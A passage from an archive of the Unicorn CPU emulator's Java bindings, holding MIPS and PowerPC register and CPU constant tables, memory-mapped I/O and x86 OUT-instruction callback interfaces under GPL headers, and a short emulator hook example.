UC_MIPS_REG_F25 = 82; public static final int UC_MIPS_REG_F26 = 83; public static final int UC_MIPS_REG_F27 = 84; public static final int UC_MIPS_REG_F28 = 85; public static final int UC_MIPS_REG_F29 = 86; public static final int UC_MIPS_REG_F30 = 87; public static final int UC_MIPS_REG_F31 = 88; public static final int UC_MIPS_REG_FCC0 = 89; public static final int UC_MIPS_REG_FCC1 = 90; public static final int UC_MIPS_REG_FCC2 = 91; public static final int UC_MIPS_REG_FCC3 = 92; public static final int UC_MIPS_REG_FCC4 = 93; public static final int 
UC_MIPS_REG_FCC5 = 94; public static final int UC_MIPS_REG_FCC6 = 95; public static final int UC_MIPS_REG_FCC7 = 96; // AFPR128 public static final int UC_MIPS_REG_W0 = 97; public static final int UC_MIPS_REG_W1 = 98; public static final int UC_MIPS_REG_W2 = 99; public static final int UC_MIPS_REG_W3 = 100; public static final int UC_MIPS_REG_W4 = 101; public static final int UC_MIPS_REG_W5 = 102; public static final int UC_MIPS_REG_W6 = 103; public static final int UC_MIPS_REG_W7 = 104; public static final int UC_MIPS_REG_W8 = 105; public static final int UC_MIPS_REG_W9 = 106; public static final int UC_MIPS_REG_W10 = 107; public static final int UC_MIPS_REG_W11 = 108; public static final int UC_MIPS_REG_W12 = 109; public static final int UC_MIPS_REG_W13 = 110; public static final int UC_MIPS_REG_W14 = 111; public static final int UC_MIPS_REG_W15 = 112; public static final int UC_MIPS_REG_W16 = 113; public static final int UC_MIPS_REG_W17 = 114; public static final int UC_MIPS_REG_W18 = 115; public static final int UC_MIPS_REG_W19 = 116; public static final int UC_MIPS_REG_W20 = 117; public static final int UC_MIPS_REG_W21 = 118; public static final int UC_MIPS_REG_W22 = 119; public static final int UC_MIPS_REG_W23 = 120; public static final int UC_MIPS_REG_W24 = 121; public static final int UC_MIPS_REG_W25 = 122; public static final int UC_MIPS_REG_W26 = 123; public static final int UC_MIPS_REG_W27 = 124; public static final int UC_MIPS_REG_W28 = 125; public static final int UC_MIPS_REG_W29 = 126; public static final int UC_MIPS_REG_W30 = 127; public static final int UC_MIPS_REG_W31 = 128; public static final int UC_MIPS_REG_HI = 129; public static final int UC_MIPS_REG_LO = 130; public static final int UC_MIPS_REG_P0 = 131; public static final int UC_MIPS_REG_P1 = 132; public static final int UC_MIPS_REG_P2 = 133; public static final int UC_MIPS_REG_MPL0 = 134; public static final int UC_MIPS_REG_MPL1 = 135; public static final int UC_MIPS_REG_MPL2 = 136; public static final int UC_MIPS_REG_CP0_CONFIG3 = 137; public static final int UC_MIPS_REG_CP0_USERLOCAL = 138; public static final int UC_MIPS_REG_CP0_STATUS = 139; public static final int UC_MIPS_REG_ENDING = 140; public static final int UC_MIPS_REG_ZERO = 2; public static final int UC_MIPS_REG_AT = 3; public static final int UC_MIPS_REG_V0 = 4; public static final int UC_MIPS_REG_V1 = 5; public static final int UC_MIPS_REG_A0 = 6; public static final int UC_MIPS_REG_A1 = 7; public static final int UC_MIPS_REG_A2 = 8; public static final int UC_MIPS_REG_A3 = 9; public static final int UC_MIPS_REG_T0 = 10; public static final int UC_MIPS_REG_T1 = 11; public static final int UC_MIPS_REG_T2 = 12; public static final int UC_MIPS_REG_T3 = 13; public static final int UC_MIPS_REG_T4 = 14; public static final int UC_MIPS_REG_T5 = 15; public static final int UC_MIPS_REG_T6 = 16; public static final int UC_MIPS_REG_T7 = 17; public static final int UC_MIPS_REG_S0 = 18; public static final int UC_MIPS_REG_S1 = 19; public static final int UC_MIPS_REG_S2 = 20; public static final int UC_MIPS_REG_S3 = 21; public static final int UC_MIPS_REG_S4 = 22; public static final int UC_MIPS_REG_S5 = 23; public static final int UC_MIPS_REG_S6 = 24; public static final int UC_MIPS_REG_S7 = 25; public static final int UC_MIPS_REG_T8 = 26; public static final int UC_MIPS_REG_T9 = 27; public static final int UC_MIPS_REG_K0 = 28; public static final int UC_MIPS_REG_K1 = 29; public static final int UC_MIPS_REG_GP = 30; public static final int UC_MIPS_REG_SP = 31; 
public static final int UC_MIPS_REG_FP = 32; public static final int UC_MIPS_REG_S8 = 32; public static final int UC_MIPS_REG_RA = 33; public static final int UC_MIPS_REG_HI0 = 45; public static final int UC_MIPS_REG_HI1 = 46; public static final int UC_MIPS_REG_HI2 = 47; public static final int UC_MIPS_REG_HI3 = 48; public static final int UC_MIPS_REG_LO0 = 45; public static final int UC_MIPS_REG_LO1 = 46; public static final int UC_MIPS_REG_LO2 = 47; public static final int UC_MIPS_REG_LO3 = 48; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MmioReadHandler.java000066400000000000000000000025231467524106700256730ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Interface for handling reads from memory-mapped I/O, mapped via * {@link Unicorn#mmio_map} */ public interface MmioReadHandler { /** Called when a memory read is made to an address in the mapped range. * * @param u {@link Unicorn} instance firing this hook * @param offset offset of the request address from the start of the * mapped range * @param size size of the memory access, in bytes * @param user user data provided when registering this hook * @return value of this I/O request */ long read(Unicorn u, long offset, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MmioWriteHandler.java000066400000000000000000000025401467524106700261110ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Interface for handling writes to memory-mapped I/O, mapped via * {@link Unicorn#mmio_map} */ public interface MmioWriteHandler { /** Called when a memory write is made to an address in the mapped range. 
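* <p>A minimal usage sketch (illustrative only: it assumes an existing
* {@code Unicorn} instance {@code uc} and that {@code mmio_map} follows the
* C API's argument order, i.e. the read handler and its user data before the
* write handler and its user data):
* <pre>{@code
* uc.mmio_map(0x40000000L, 0x1000L,
*     (engine, offset, size, user) -> 0L, null,   // all reads return 0
*     (engine, offset, size, value, user) -> System.out.printf(
*         "MMIO write 0x%x (%d bytes) at +0x%x%n", value, size, offset),
*     null);
* }</pre>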
unicorn-2.1.1/bindings/java/src/main/java/unicorn/OutHook.java
/* Java bindings for the Unicorn Emulator Engine

   Copyright(c) 2015 Chris Eagle

   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License version 2 as
   published by the Free Software Foundation.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
   02110-1301, USA.
*/
package unicorn;

/** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_OUT} */
public interface OutHook extends InstructionHook {
    /** Called to handle an x86 OUT instruction.
     *
     * @param u     {@link Unicorn} instance firing this hook
     * @param port  I/O port number
     * @param size  size of the request (1, 2, or 4 bytes)
     * @param value value being written to the port
     * @param user  user data provided when registering this hook
     */
    public void hook(Unicorn u, int port, int size, int value, Object user);
}
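/* Illustrative sketch (not from the Unicorn sources): intercepting the x86
   OUT instruction with an OutHook. Assumes the instruction-hook overload
   hook_add(InstructionHook callback, int insn, long begin, long end,
   Object user); passing begin=1, end=0 follows the Unicorn convention of
   hooking the entire address space. */
import unicorn.*;

public class OutHookExample {
    public static void main(String[] args) {
        Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32);
        // mov al, 0x41 ; out 0x46, al
        byte[] code = { (byte) 0xB0, 0x41, (byte) 0xE6, 0x46 };
        uc.mem_map(0x1000, 0x1000, Unicorn.UC_PROT_ALL);
        uc.mem_write(0x1000, code);
        OutHook hook = (u, port, size, value, user) -> System.out.printf(
                "OUT to port 0x%x (%d bytes): 0x%x%n", port, size, value);
        uc.hook_add(hook, Unicorn.UC_X86_INS_OUT, 1, 0, null);
        uc.emu_start(0x1000, 0x1000 + code.length, 0, 0);
        uc.close();
    }
}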
unicorn-2.1.1/bindings/java/src/main/java/unicorn/PpcConst.java
// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT

package unicorn;

public interface PpcConst {

    // PPC CPU
    public static final int UC_CPU_PPC32_401 = 0;
    public static final int UC_CPU_PPC32_401A1 = 1;
    public static final int UC_CPU_PPC32_401B2 = 2;
    public static final int UC_CPU_PPC32_401C2 = 3;
    public static final int UC_CPU_PPC32_401D2 = 4;
    public static final int UC_CPU_PPC32_401E2 = 5;
    public static final int UC_CPU_PPC32_401F2 = 6;
    public static final int UC_CPU_PPC32_401G2 = 7;
    public static final int UC_CPU_PPC32_IOP480 = 8;
    public static final int UC_CPU_PPC32_COBRA = 9;
    public static final int UC_CPU_PPC32_403GA = 10;
    public static final int UC_CPU_PPC32_403GB = 11;
    public static final int UC_CPU_PPC32_403GC = 12;
    public static final int UC_CPU_PPC32_403GCX = 13;
    public static final int UC_CPU_PPC32_405D2 = 14;
    public static final int UC_CPU_PPC32_405D4 = 15;
    public static final int UC_CPU_PPC32_405CRA = 16;
    public static final int UC_CPU_PPC32_405CRB = 17;
    public static final int UC_CPU_PPC32_405CRC = 18;
    public static final int UC_CPU_PPC32_405EP = 19;
    public static final int UC_CPU_PPC32_405EZ = 20;
    public static final int UC_CPU_PPC32_405GPA = 21;
    public static final int UC_CPU_PPC32_405GPB = 22;
    public static final int UC_CPU_PPC32_405GPC = 23;
    public static final int UC_CPU_PPC32_405GPD = 24;
    public static final int UC_CPU_PPC32_405GPR = 25;
    public static final int UC_CPU_PPC32_405LP = 26;
    public static final int UC_CPU_PPC32_NPE405H = 27;
    public static final int UC_CPU_PPC32_NPE405H2 = 28;
    public static final int UC_CPU_PPC32_NPE405L = 29;
    public static final int UC_CPU_PPC32_NPE4GS3 = 30;
    public static final int UC_CPU_PPC32_STB03 = 31;
    public static final int UC_CPU_PPC32_STB04 = 32;
    public static final int UC_CPU_PPC32_STB25 = 33;
    public static final int UC_CPU_PPC32_X2VP4 = 34;
    public static final int UC_CPU_PPC32_X2VP20 = 35;
    public static final int UC_CPU_PPC32_440_XILINX = 36;
    public static final int UC_CPU_PPC32_440_XILINX_W_DFPU = 37;
    public static final int UC_CPU_PPC32_440EPA = 38;
    public static final int UC_CPU_PPC32_440EPB = 39;
    public static final int UC_CPU_PPC32_440EPX = 40;
    public static final int UC_CPU_PPC32_460EXB = 41;
    public static final int UC_CPU_PPC32_G2 = 42;
    public static final int UC_CPU_PPC32_G2H4 = 43;
    public static final int UC_CPU_PPC32_G2GP = 44;
    public static final int UC_CPU_PPC32_G2LS = 45;
    public static final int UC_CPU_PPC32_G2HIP3 = 46;
    public static final int UC_CPU_PPC32_G2HIP4 = 47;
    public static final int UC_CPU_PPC32_MPC603 = 48;
    public static final int UC_CPU_PPC32_G2LE = 49;
    public static final int UC_CPU_PPC32_G2LEGP = 50;
    public static final int UC_CPU_PPC32_G2LELS = 51;
    public static final int UC_CPU_PPC32_G2LEGP1 = 52;
    public static final int UC_CPU_PPC32_G2LEGP3 = 53;
    public static final int UC_CPU_PPC32_MPC5200_V10 = 54;
    public static final int UC_CPU_PPC32_MPC5200_V11 = 55;
    public static final int UC_CPU_PPC32_MPC5200_V12 = 56;
    public static final int UC_CPU_PPC32_MPC5200B_V20 = 57;
    public static final int UC_CPU_PPC32_MPC5200B_V21 = 58;
    public static final int UC_CPU_PPC32_E200Z5 = 59;
    public static final int UC_CPU_PPC32_E200Z6 = 60;
    public static final int UC_CPU_PPC32_E300C1 = 61;
    public static final int UC_CPU_PPC32_E300C2 = 62;
    public static final int UC_CPU_PPC32_E300C3 = 63;
    public static final int UC_CPU_PPC32_E300C4 = 64;
    public static final int UC_CPU_PPC32_MPC8343 = 65;
    public static final int UC_CPU_PPC32_MPC8343A = 66;
    public static final int UC_CPU_PPC32_MPC8343E = 67;
    public static final int UC_CPU_PPC32_MPC8343EA = 68;
public static final int UC_CPU_PPC32_MPC8347T = 69; public static final int UC_CPU_PPC32_MPC8347P = 70; public static final int UC_CPU_PPC32_MPC8347AT = 71; public static final int UC_CPU_PPC32_MPC8347AP = 72; public static final int UC_CPU_PPC32_MPC8347ET = 73; public static final int UC_CPU_PPC32_MPC8347EP = 74; public static final int UC_CPU_PPC32_MPC8347EAT = 75; public static final int UC_CPU_PPC32_MPC8347EAP = 76; public static final int UC_CPU_PPC32_MPC8349 = 77; public static final int UC_CPU_PPC32_MPC8349A = 78; public static final int UC_CPU_PPC32_MPC8349E = 79; public static final int UC_CPU_PPC32_MPC8349EA = 80; public static final int UC_CPU_PPC32_MPC8377 = 81; public static final int UC_CPU_PPC32_MPC8377E = 82; public static final int UC_CPU_PPC32_MPC8378 = 83; public static final int UC_CPU_PPC32_MPC8378E = 84; public static final int UC_CPU_PPC32_MPC8379 = 85; public static final int UC_CPU_PPC32_MPC8379E = 86; public static final int UC_CPU_PPC32_E500_V10 = 87; public static final int UC_CPU_PPC32_E500_V20 = 88; public static final int UC_CPU_PPC32_E500V2_V10 = 89; public static final int UC_CPU_PPC32_E500V2_V20 = 90; public static final int UC_CPU_PPC32_E500V2_V21 = 91; public static final int UC_CPU_PPC32_E500V2_V22 = 92; public static final int UC_CPU_PPC32_E500V2_V30 = 93; public static final int UC_CPU_PPC32_E500MC = 94; public static final int UC_CPU_PPC32_MPC8533_V10 = 95; public static final int UC_CPU_PPC32_MPC8533_V11 = 96; public static final int UC_CPU_PPC32_MPC8533E_V10 = 97; public static final int UC_CPU_PPC32_MPC8533E_V11 = 98; public static final int UC_CPU_PPC32_MPC8540_V10 = 99; public static final int UC_CPU_PPC32_MPC8540_V20 = 100; public static final int UC_CPU_PPC32_MPC8540_V21 = 101; public static final int UC_CPU_PPC32_MPC8541_V10 = 102; public static final int UC_CPU_PPC32_MPC8541_V11 = 103; public static final int UC_CPU_PPC32_MPC8541E_V10 = 104; public static final int UC_CPU_PPC32_MPC8541E_V11 = 105; public static final int UC_CPU_PPC32_MPC8543_V10 = 106; public static final int UC_CPU_PPC32_MPC8543_V11 = 107; public static final int UC_CPU_PPC32_MPC8543_V20 = 108; public static final int UC_CPU_PPC32_MPC8543_V21 = 109; public static final int UC_CPU_PPC32_MPC8543E_V10 = 110; public static final int UC_CPU_PPC32_MPC8543E_V11 = 111; public static final int UC_CPU_PPC32_MPC8543E_V20 = 112; public static final int UC_CPU_PPC32_MPC8543E_V21 = 113; public static final int UC_CPU_PPC32_MPC8544_V10 = 114; public static final int UC_CPU_PPC32_MPC8544_V11 = 115; public static final int UC_CPU_PPC32_MPC8544E_V10 = 116; public static final int UC_CPU_PPC32_MPC8544E_V11 = 117; public static final int UC_CPU_PPC32_MPC8545_V20 = 118; public static final int UC_CPU_PPC32_MPC8545_V21 = 119; public static final int UC_CPU_PPC32_MPC8545E_V20 = 120; public static final int UC_CPU_PPC32_MPC8545E_V21 = 121; public static final int UC_CPU_PPC32_MPC8547E_V20 = 122; public static final int UC_CPU_PPC32_MPC8547E_V21 = 123; public static final int UC_CPU_PPC32_MPC8548_V10 = 124; public static final int UC_CPU_PPC32_MPC8548_V11 = 125; public static final int UC_CPU_PPC32_MPC8548_V20 = 126; public static final int UC_CPU_PPC32_MPC8548_V21 = 127; public static final int UC_CPU_PPC32_MPC8548E_V10 = 128; public static final int UC_CPU_PPC32_MPC8548E_V11 = 129; public static final int UC_CPU_PPC32_MPC8548E_V20 = 130; public static final int UC_CPU_PPC32_MPC8548E_V21 = 131; public static final int UC_CPU_PPC32_MPC8555_V10 = 132; public static final int UC_CPU_PPC32_MPC8555_V11 
= 133; public static final int UC_CPU_PPC32_MPC8555E_V10 = 134; public static final int UC_CPU_PPC32_MPC8555E_V11 = 135; public static final int UC_CPU_PPC32_MPC8560_V10 = 136; public static final int UC_CPU_PPC32_MPC8560_V20 = 137; public static final int UC_CPU_PPC32_MPC8560_V21 = 138; public static final int UC_CPU_PPC32_MPC8567 = 139; public static final int UC_CPU_PPC32_MPC8567E = 140; public static final int UC_CPU_PPC32_MPC8568 = 141; public static final int UC_CPU_PPC32_MPC8568E = 142; public static final int UC_CPU_PPC32_MPC8572 = 143; public static final int UC_CPU_PPC32_MPC8572E = 144; public static final int UC_CPU_PPC32_E600 = 145; public static final int UC_CPU_PPC32_MPC8610 = 146; public static final int UC_CPU_PPC32_MPC8641 = 147; public static final int UC_CPU_PPC32_MPC8641D = 148; public static final int UC_CPU_PPC32_601_V0 = 149; public static final int UC_CPU_PPC32_601_V1 = 150; public static final int UC_CPU_PPC32_601_V2 = 151; public static final int UC_CPU_PPC32_602 = 152; public static final int UC_CPU_PPC32_603 = 153; public static final int UC_CPU_PPC32_603E_V1_1 = 154; public static final int UC_CPU_PPC32_603E_V1_2 = 155; public static final int UC_CPU_PPC32_603E_V1_3 = 156; public static final int UC_CPU_PPC32_603E_V1_4 = 157; public static final int UC_CPU_PPC32_603E_V2_2 = 158; public static final int UC_CPU_PPC32_603E_V3 = 159; public static final int UC_CPU_PPC32_603E_V4 = 160; public static final int UC_CPU_PPC32_603E_V4_1 = 161; public static final int UC_CPU_PPC32_603E7 = 162; public static final int UC_CPU_PPC32_603E7T = 163; public static final int UC_CPU_PPC32_603E7V = 164; public static final int UC_CPU_PPC32_603E7V1 = 165; public static final int UC_CPU_PPC32_603E7V2 = 166; public static final int UC_CPU_PPC32_603P = 167; public static final int UC_CPU_PPC32_604 = 168; public static final int UC_CPU_PPC32_604E_V1_0 = 169; public static final int UC_CPU_PPC32_604E_V2_2 = 170; public static final int UC_CPU_PPC32_604E_V2_4 = 171; public static final int UC_CPU_PPC32_604R = 172; public static final int UC_CPU_PPC32_740_V1_0 = 173; public static final int UC_CPU_PPC32_750_V1_0 = 174; public static final int UC_CPU_PPC32_740_V2_0 = 175; public static final int UC_CPU_PPC32_750_V2_0 = 176; public static final int UC_CPU_PPC32_740_V2_1 = 177; public static final int UC_CPU_PPC32_750_V2_1 = 178; public static final int UC_CPU_PPC32_740_V2_2 = 179; public static final int UC_CPU_PPC32_750_V2_2 = 180; public static final int UC_CPU_PPC32_740_V3_0 = 181; public static final int UC_CPU_PPC32_750_V3_0 = 182; public static final int UC_CPU_PPC32_740_V3_1 = 183; public static final int UC_CPU_PPC32_750_V3_1 = 184; public static final int UC_CPU_PPC32_740E = 185; public static final int UC_CPU_PPC32_750E = 186; public static final int UC_CPU_PPC32_740P = 187; public static final int UC_CPU_PPC32_750P = 188; public static final int UC_CPU_PPC32_750CL_V1_0 = 189; public static final int UC_CPU_PPC32_750CL_V2_0 = 190; public static final int UC_CPU_PPC32_750CX_V1_0 = 191; public static final int UC_CPU_PPC32_750CX_V2_0 = 192; public static final int UC_CPU_PPC32_750CX_V2_1 = 193; public static final int UC_CPU_PPC32_750CX_V2_2 = 194; public static final int UC_CPU_PPC32_750CXE_V2_1 = 195; public static final int UC_CPU_PPC32_750CXE_V2_2 = 196; public static final int UC_CPU_PPC32_750CXE_V2_3 = 197; public static final int UC_CPU_PPC32_750CXE_V2_4 = 198; public static final int UC_CPU_PPC32_750CXE_V2_4B = 199; public static final int UC_CPU_PPC32_750CXE_V3_0 = 200; 
public static final int UC_CPU_PPC32_750CXE_V3_1 = 201; public static final int UC_CPU_PPC32_750CXE_V3_1B = 202; public static final int UC_CPU_PPC32_750CXR = 203; public static final int UC_CPU_PPC32_750FL = 204; public static final int UC_CPU_PPC32_750FX_V1_0 = 205; public static final int UC_CPU_PPC32_750FX_V2_0 = 206; public static final int UC_CPU_PPC32_750FX_V2_1 = 207; public static final int UC_CPU_PPC32_750FX_V2_2 = 208; public static final int UC_CPU_PPC32_750FX_V2_3 = 209; public static final int UC_CPU_PPC32_750GL = 210; public static final int UC_CPU_PPC32_750GX_V1_0 = 211; public static final int UC_CPU_PPC32_750GX_V1_1 = 212; public static final int UC_CPU_PPC32_750GX_V1_2 = 213; public static final int UC_CPU_PPC32_750L_V2_0 = 214; public static final int UC_CPU_PPC32_750L_V2_1 = 215; public static final int UC_CPU_PPC32_750L_V2_2 = 216; public static final int UC_CPU_PPC32_750L_V3_0 = 217; public static final int UC_CPU_PPC32_750L_V3_2 = 218; public static final int UC_CPU_PPC32_745_V1_0 = 219; public static final int UC_CPU_PPC32_755_V1_0 = 220; public static final int UC_CPU_PPC32_745_V1_1 = 221; public static final int UC_CPU_PPC32_755_V1_1 = 222; public static final int UC_CPU_PPC32_745_V2_0 = 223; public static final int UC_CPU_PPC32_755_V2_0 = 224; public static final int UC_CPU_PPC32_745_V2_1 = 225; public static final int UC_CPU_PPC32_755_V2_1 = 226; public static final int UC_CPU_PPC32_745_V2_2 = 227; public static final int UC_CPU_PPC32_755_V2_2 = 228; public static final int UC_CPU_PPC32_745_V2_3 = 229; public static final int UC_CPU_PPC32_755_V2_3 = 230; public static final int UC_CPU_PPC32_745_V2_4 = 231; public static final int UC_CPU_PPC32_755_V2_4 = 232; public static final int UC_CPU_PPC32_745_V2_5 = 233; public static final int UC_CPU_PPC32_755_V2_5 = 234; public static final int UC_CPU_PPC32_745_V2_6 = 235; public static final int UC_CPU_PPC32_755_V2_6 = 236; public static final int UC_CPU_PPC32_745_V2_7 = 237; public static final int UC_CPU_PPC32_755_V2_7 = 238; public static final int UC_CPU_PPC32_745_V2_8 = 239; public static final int UC_CPU_PPC32_755_V2_8 = 240; public static final int UC_CPU_PPC32_7400_V1_0 = 241; public static final int UC_CPU_PPC32_7400_V1_1 = 242; public static final int UC_CPU_PPC32_7400_V2_0 = 243; public static final int UC_CPU_PPC32_7400_V2_1 = 244; public static final int UC_CPU_PPC32_7400_V2_2 = 245; public static final int UC_CPU_PPC32_7400_V2_6 = 246; public static final int UC_CPU_PPC32_7400_V2_7 = 247; public static final int UC_CPU_PPC32_7400_V2_8 = 248; public static final int UC_CPU_PPC32_7400_V2_9 = 249; public static final int UC_CPU_PPC32_7410_V1_0 = 250; public static final int UC_CPU_PPC32_7410_V1_1 = 251; public static final int UC_CPU_PPC32_7410_V1_2 = 252; public static final int UC_CPU_PPC32_7410_V1_3 = 253; public static final int UC_CPU_PPC32_7410_V1_4 = 254; public static final int UC_CPU_PPC32_7448_V1_0 = 255; public static final int UC_CPU_PPC32_7448_V1_1 = 256; public static final int UC_CPU_PPC32_7448_V2_0 = 257; public static final int UC_CPU_PPC32_7448_V2_1 = 258; public static final int UC_CPU_PPC32_7450_V1_0 = 259; public static final int UC_CPU_PPC32_7450_V1_1 = 260; public static final int UC_CPU_PPC32_7450_V1_2 = 261; public static final int UC_CPU_PPC32_7450_V2_0 = 262; public static final int UC_CPU_PPC32_7450_V2_1 = 263; public static final int UC_CPU_PPC32_7441_V2_1 = 264; public static final int UC_CPU_PPC32_7441_V2_3 = 265; public static final int UC_CPU_PPC32_7451_V2_3 = 266; public 
static final int UC_CPU_PPC32_7441_V2_10 = 267; public static final int UC_CPU_PPC32_7451_V2_10 = 268; public static final int UC_CPU_PPC32_7445_V1_0 = 269; public static final int UC_CPU_PPC32_7455_V1_0 = 270; public static final int UC_CPU_PPC32_7445_V2_1 = 271; public static final int UC_CPU_PPC32_7455_V2_1 = 272; public static final int UC_CPU_PPC32_7445_V3_2 = 273; public static final int UC_CPU_PPC32_7455_V3_2 = 274; public static final int UC_CPU_PPC32_7445_V3_3 = 275; public static final int UC_CPU_PPC32_7455_V3_3 = 276; public static final int UC_CPU_PPC32_7445_V3_4 = 277; public static final int UC_CPU_PPC32_7455_V3_4 = 278; public static final int UC_CPU_PPC32_7447_V1_0 = 279; public static final int UC_CPU_PPC32_7457_V1_0 = 280; public static final int UC_CPU_PPC32_7447_V1_1 = 281; public static final int UC_CPU_PPC32_7457_V1_1 = 282; public static final int UC_CPU_PPC32_7457_V1_2 = 283; public static final int UC_CPU_PPC32_7447A_V1_0 = 284; public static final int UC_CPU_PPC32_7457A_V1_0 = 285; public static final int UC_CPU_PPC32_7447A_V1_1 = 286; public static final int UC_CPU_PPC32_7457A_V1_1 = 287; public static final int UC_CPU_PPC32_7447A_V1_2 = 288; public static final int UC_CPU_PPC32_7457A_V1_2 = 289; public static final int UC_CPU_PPC32_ENDING = 290; // PPC64 CPU public static final int UC_CPU_PPC64_E5500 = 0; public static final int UC_CPU_PPC64_E6500 = 1; public static final int UC_CPU_PPC64_970_V2_2 = 2; public static final int UC_CPU_PPC64_970FX_V1_0 = 3; public static final int UC_CPU_PPC64_970FX_V2_0 = 4; public static final int UC_CPU_PPC64_970FX_V2_1 = 5; public static final int UC_CPU_PPC64_970FX_V3_0 = 6; public static final int UC_CPU_PPC64_970FX_V3_1 = 7; public static final int UC_CPU_PPC64_970MP_V1_0 = 8; public static final int UC_CPU_PPC64_970MP_V1_1 = 9; public static final int UC_CPU_PPC64_POWER5_V2_1 = 10; public static final int UC_CPU_PPC64_POWER7_V2_3 = 11; public static final int UC_CPU_PPC64_POWER7_V2_1 = 12; public static final int UC_CPU_PPC64_POWER8E_V2_1 = 13; public static final int UC_CPU_PPC64_POWER8_V2_0 = 14; public static final int UC_CPU_PPC64_POWER8NVL_V1_0 = 15; public static final int UC_CPU_PPC64_POWER9_V1_0 = 16; public static final int UC_CPU_PPC64_POWER9_V2_0 = 17; public static final int UC_CPU_PPC64_POWER10_V1_0 = 18; public static final int UC_CPU_PPC64_ENDING = 19; // PPC registers public static final int UC_PPC_REG_INVALID = 0; // General purpose registers public static final int UC_PPC_REG_PC = 1; public static final int UC_PPC_REG_0 = 2; public static final int UC_PPC_REG_1 = 3; public static final int UC_PPC_REG_2 = 4; public static final int UC_PPC_REG_3 = 5; public static final int UC_PPC_REG_4 = 6; public static final int UC_PPC_REG_5 = 7; public static final int UC_PPC_REG_6 = 8; public static final int UC_PPC_REG_7 = 9; public static final int UC_PPC_REG_8 = 10; public static final int UC_PPC_REG_9 = 11; public static final int UC_PPC_REG_10 = 12; public static final int UC_PPC_REG_11 = 13; public static final int UC_PPC_REG_12 = 14; public static final int UC_PPC_REG_13 = 15; public static final int UC_PPC_REG_14 = 16; public static final int UC_PPC_REG_15 = 17; public static final int UC_PPC_REG_16 = 18; public static final int UC_PPC_REG_17 = 19; public static final int UC_PPC_REG_18 = 20; public static final int UC_PPC_REG_19 = 21; public static final int UC_PPC_REG_20 = 22; public static final int UC_PPC_REG_21 = 23; public static final int UC_PPC_REG_22 = 24; public static final int UC_PPC_REG_23 = 25; 
public static final int UC_PPC_REG_24 = 26; public static final int UC_PPC_REG_25 = 27; public static final int UC_PPC_REG_26 = 28; public static final int UC_PPC_REG_27 = 29; public static final int UC_PPC_REG_28 = 30; public static final int UC_PPC_REG_29 = 31; public static final int UC_PPC_REG_30 = 32; public static final int UC_PPC_REG_31 = 33; public static final int UC_PPC_REG_CR0 = 34; public static final int UC_PPC_REG_CR1 = 35; public static final int UC_PPC_REG_CR2 = 36; public static final int UC_PPC_REG_CR3 = 37; public static final int UC_PPC_REG_CR4 = 38; public static final int UC_PPC_REG_CR5 = 39; public static final int UC_PPC_REG_CR6 = 40; public static final int UC_PPC_REG_CR7 = 41; public static final int UC_PPC_REG_FPR0 = 42; public static final int UC_PPC_REG_FPR1 = 43; public static final int UC_PPC_REG_FPR2 = 44; public static final int UC_PPC_REG_FPR3 = 45; public static final int UC_PPC_REG_FPR4 = 46; public static final int UC_PPC_REG_FPR5 = 47; public static final int UC_PPC_REG_FPR6 = 48; public static final int UC_PPC_REG_FPR7 = 49; public static final int UC_PPC_REG_FPR8 = 50; public static final int UC_PPC_REG_FPR9 = 51; public static final int UC_PPC_REG_FPR10 = 52; public static final int UC_PPC_REG_FPR11 = 53; public static final int UC_PPC_REG_FPR12 = 54; public static final int UC_PPC_REG_FPR13 = 55; public static final int UC_PPC_REG_FPR14 = 56; public static final int UC_PPC_REG_FPR15 = 57; public static final int UC_PPC_REG_FPR16 = 58; public static final int UC_PPC_REG_FPR17 = 59; public static final int UC_PPC_REG_FPR18 = 60; public static final int UC_PPC_REG_FPR19 = 61; public static final int UC_PPC_REG_FPR20 = 62; public static final int UC_PPC_REG_FPR21 = 63; public static final int UC_PPC_REG_FPR22 = 64; public static final int UC_PPC_REG_FPR23 = 65; public static final int UC_PPC_REG_FPR24 = 66; public static final int UC_PPC_REG_FPR25 = 67; public static final int UC_PPC_REG_FPR26 = 68; public static final int UC_PPC_REG_FPR27 = 69; public static final int UC_PPC_REG_FPR28 = 70; public static final int UC_PPC_REG_FPR29 = 71; public static final int UC_PPC_REG_FPR30 = 72; public static final int UC_PPC_REG_FPR31 = 73; public static final int UC_PPC_REG_LR = 74; public static final int UC_PPC_REG_XER = 75; public static final int UC_PPC_REG_CTR = 76; public static final int UC_PPC_REG_MSR = 77; public static final int UC_PPC_REG_FPSCR = 78; public static final int UC_PPC_REG_CR = 79; public static final int UC_PPC_REG_ENDING = 80; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/RiscvConst.java000066400000000000000000000346661467524106700250120ustar00rootroot00000000000000// For Unicorn Engine. 
